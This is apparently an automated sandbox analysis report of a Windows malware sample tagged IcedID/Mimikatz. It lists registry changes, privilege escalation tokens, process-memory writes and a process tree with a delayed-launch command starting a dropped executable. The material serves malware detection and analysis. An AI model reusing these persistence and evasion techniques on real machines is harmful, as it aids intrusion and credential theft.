Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-ad-b1-93-64-4b\WpadDecisionReason = "1" bubpucp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" lunglbpll.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-ad-b1-93-64-4b\WpadDecisionTime = b0cec8e3674ada01 bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bubpucp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{34DC3725-8642-49E4-BBB9-F5D0E395C9F7}\WpadDecisionTime = b0de39ae674ada01 bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates bubpucp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{34DC3725-8642-49E4-BBB9-F5D0E395C9F7}\WpadDecision = "0" bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 cacls.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals lunglbpll.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" lunglbpll.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{34DC3725-8642-49E4-BBB9-F5D0E395C9F7}\WpadNetworkName = "Network 2" bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-ad-b1-93-64-4b\WpadDecisionTime = b0de39ae674ada01 bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed bubpucp.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" bubpucp.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 bubpucp.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 bubpucp.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 bubpucp.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 bubpucp.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2644 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 320 bubpucp.exe 3704 bubpucp.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe -
Suspicious behavior: LoadsDriver 31 IoCs
pid Process 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found 484 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2080 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 2080 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2700 bubpucp.exe Token: SeDebugPrivilege 2788 bubpucp.exe Token: SeDebugPrivilege 996 vfshost.exe Token: SeAuditPrivilege 2676 svchost.exe Token: SeDebugPrivilege 1816 lunglbpll.exe Token: SeShutdownPrivilege 1816 lunglbpll.exe Token: SeLockMemoryPrivilege 448 bpgzsl.exe Token: SeLockMemoryPrivilege 448 bpgzsl.exe Token: SeDebugPrivilege 896 lunglbpll.exe Token: SeShutdownPrivilege 896 lunglbpll.exe Token: SeDebugPrivilege 628 lunglbpll.exe Token: SeShutdownPrivilege 628 lunglbpll.exe Token: SeDebugPrivilege 1644 lunglbpll.exe Token: SeShutdownPrivilege 1644 lunglbpll.exe Token: SeDebugPrivilege 2656 lunglbpll.exe Token: SeShutdownPrivilege 2656 lunglbpll.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2080 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe 2080 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe 2700 bubpucp.exe 2700 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 536 xohudmc.exe 992 rifzsk.exe 320 bubpucp.exe 320 bubpucp.exe 3704 bubpucp.exe 3704 bubpucp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2080 wrote to memory of 2976 2080 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe 28 PID 2080 wrote to memory of 2976 2080 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe 28 PID 2080 wrote to memory of 2976 2080 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe 28 PID 2080 wrote to memory of 2976 2080 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe 28 PID 2976 wrote to memory of 2644 2976 cmd.exe 29 PID 2976 wrote to memory of 2644 2976 cmd.exe 29 PID 2976 wrote to memory of 2644 2976 cmd.exe 29 PID 2976 wrote to memory of 2644 2976 cmd.exe 29 PID 2976 wrote to memory of 2700 2976 cmd.exe 40 PID 2976 wrote to memory of 2700 2976 cmd.exe 40 PID 2976 wrote to memory of 2700 2976 cmd.exe 40 PID 2976 wrote to memory of 2700 2976 cmd.exe 40 PID 2788 wrote to memory of 2244 2788 bubpucp.exe 38 PID 2788 wrote to memory of 2244 2788 bubpucp.exe 38 PID 2788 wrote to memory of 2244 2788 bubpucp.exe 38 PID 2788 wrote to memory of 2244 2788 bubpucp.exe 38 PID 2244 wrote to memory of 2808 2244 cmd.exe 36 PID 2244 wrote to memory of 2808 2244 cmd.exe 36 PID 2244 wrote to memory of 2808 2244 cmd.exe 36 PID 2244 wrote to memory of 2808 2244 cmd.exe 36 PID 2244 wrote to memory of 2652 2244 cmd.exe 87 PID 2244 wrote to memory of 2652 2244 cmd.exe 87 PID 2244 wrote to memory of 2652 2244 cmd.exe 87 PID 2244 wrote to memory of 2652 2244 cmd.exe 87 PID 2244 wrote to memory of 2764 2244 cmd.exe 32 PID 2244 wrote to memory of 2764 2244 cmd.exe 32 PID 2244 wrote to memory of 2764 2244 cmd.exe 32 PID 2244 wrote to memory of 2764 2244 cmd.exe 32 PID 2244 wrote to memory of 2688 2244 cmd.exe 35 PID 2244 wrote to memory of 2688 2244 cmd.exe 35 PID 2244 wrote to memory of 2688 2244 cmd.exe 35 PID 2244 wrote to memory of 2688 2244 cmd.exe 35 PID 2244 wrote to memory of 2664 2244 cmd.exe 34 PID 2244 wrote to memory of 2664 2244 cmd.exe 34 PID 2244 wrote to memory of 2664 2244 cmd.exe 34 PID 2244 wrote to memory of 2664 2244 cmd.exe 34 PID 2244 wrote to memory of 2600 2244 cmd.exe 33 PID 2244 wrote to memory of 2600 2244 cmd.exe 33 PID 2244 wrote to memory of 2600 2244 cmd.exe 33 PID 2244 wrote to memory of 2600 2244 cmd.exe 33 PID 2788 wrote to memory of 320 2788 bubpucp.exe 168 PID 2788 wrote to memory of 320 2788 bubpucp.exe 168 PID 2788 wrote to memory of 320 2788 bubpucp.exe 168 PID 2788 wrote to memory of 320 2788 bubpucp.exe 168 PID 2788 wrote to memory of 548 2788 bubpucp.exe 44 PID 2788 wrote to memory of 548 2788 bubpucp.exe 44 PID 2788 wrote to memory of 548 2788 bubpucp.exe 44 PID 2788 wrote to memory of 548 2788 bubpucp.exe 44 PID 2788 wrote to memory of 2880 2788 bubpucp.exe 46 PID 2788 wrote to memory of 2880 2788 bubpucp.exe 46 PID 2788 wrote to memory of 2880 2788 bubpucp.exe 46 PID 2788 wrote to memory of 2880 2788 bubpucp.exe 46 PID 2788 wrote to memory of 2396 2788 bubpucp.exe 65 PID 2788 wrote to memory of 2396 2788 bubpucp.exe 65 PID 2788 wrote to memory of 2396 2788 bubpucp.exe 65 PID 2788 wrote to memory of 2396 2788 bubpucp.exe 65 PID 2396 wrote to memory of 2488 2396 cmd.exe 63 PID 2396 wrote to memory of 2488 2396 cmd.exe 63 PID 2396 wrote to memory of 2488 2396 cmd.exe 63 PID 2396 wrote to memory of 2488 2396 cmd.exe 63 PID 2396 wrote to memory of 2488 2396 cmd.exe 63 PID 2396 wrote to memory of 2488 2396 cmd.exe 63 PID 2396 wrote to memory of 2488 2396 cmd.exe 63 PID 2488 wrote to memory of 1560 2488 wpcap.exe 117
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:916
-
C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe"C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Users\Admin\AppData\Local\Temp\2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\jgebjtcb\bubpucp.exe2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
